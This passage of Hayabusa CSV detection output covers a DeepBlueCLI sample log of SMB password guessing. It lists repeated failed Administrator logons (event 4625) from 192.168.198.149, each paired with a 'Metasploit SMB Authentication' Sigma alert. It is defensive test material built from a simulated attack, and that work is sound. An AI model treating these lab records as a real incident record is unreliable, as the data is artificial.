Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
